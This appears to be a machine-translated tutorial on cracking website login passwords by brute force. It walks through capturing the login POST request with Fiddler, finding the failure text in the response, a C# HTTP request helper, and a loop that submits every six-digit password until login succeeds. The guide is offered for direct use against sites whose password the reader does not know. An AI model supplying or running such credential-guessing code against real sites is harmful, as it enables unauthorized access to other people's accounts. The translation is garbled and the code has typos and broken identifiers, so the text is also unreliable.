The technology used is also the network grab packet, DOM tree analysis, network request and so on.
- Network Grab Bag
- DOM Tree Analysis
- Network requests
- Circular cracking
Network Grab Bag
Here to grab the bag is very simple, first open the Fiddler software, and then open the website you want to crack, enter the user name and a fake password (if you know the real password, there is no need to crack), click Login, this time will be seen from the Fiddler a login request, is generally a POST request, You can clearly see the requested URL, user name, password, etc. from the request content, copy the statement and prepare for the next step.
DOM Tree Analysis
Here the DOM tree analysis, only need to analyze the results of just that login request, it is generally prompt you login failure, but some return is the entire HTML page, some JSON statements and so on, but after all, you will find a sign that you failed to log in the place, this also recorded, ready to work on the next step.
Network requests
This network request in the previous article also has introduced, here I again release code, but need to emphasize is using (StreamReader sr = new StreamReader(instream, encoding))
in the encoding, if you can see the return page encoding, here to the corresponding code, otherwise at noon will appear garbled situation, if not know, Then you can use GB2312 and so on each test, until there is no garbled.
public string getcontent ( String method, string URL, string postdata = null)
{
HttpWebResponse response = null; HttpWebRequest request = null; if (cookie = = null) cookie = new Cookiecontainer (); Prepare request ... try {//Set parameter request = WebRequest.Create (URL) as HttpWebRequest; Request. Cookiecontainer = cookie; Request. AllowAutoRedirect = true; Request. Method = method. ToUpper (); Request. ContentType = "application/x-www-form-urlencoded"; String useragent = String. Format ("mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.8670) "); Request. useragent = useragent; Request. ContentLength = Postdata.length; if (method. ToUpper () = = "POST") {if (!string. IsNullOrEmpty (PostData)) {byte[] data = Encoding.Default.GetBytes (postdata); Request. ContentLength = data. Length; using (Stream OutStream = Request. GetRequestStream ()) {OutStream. Write (data, 0, data. LeNgth); }}}//Send request and get corresponding response data response = requests. GetResponse () as HttpWebResponse; Until request. The GetResponse () program only starts sending post requests to the target page using the Stream instream = response. GetResponseStream ()) {using (StreamReader sr = new StreamReader (instream, encoding)) { Returns the result page (HTML) code string content = Sr. ReadToEnd (); return content; }}} catch (Exception ex) {string err = ex. Message; return err; The finally {if (response! = NULL) response. Close (); }}
Circular cracking
Here is the core of this article, know the login request method and login failure prompt, Next is through the same as we cracked password box password one by one to try, here is only the program automatically completed, first write a loop from 0 to 999999 (assuming 6-digit password), Then stitching the data in the login request (including the user name, password), and then send the network request to determine the results of the request, if it contains the previously found failure identity, continue to loop, if not included, congratulations your password found. The code is as follows:
int start = 0;int end = 999999;for (int i = start; I <= end; i++) { var pass = i.tostring (). PadLeft (6, ' 0 ');//less than 6 bits, left complement 0 var post = "Usename=yourname" + "&password=" + pass;//stitching requested data var res = Getconten T ("Post", loginurl, post); if (!res. Contain ("Fail ID")) { MessageBox.Show ("Password is:" + Pass); return;} }
i.ToString().PadLeft(6, ‘0‘)
the function is less than 6 bit 0, let the password meet 6 bits. var post = "usename=yourname" + "&password=" + pass
the function is to splice the data sent.
Web crawler (password cracking)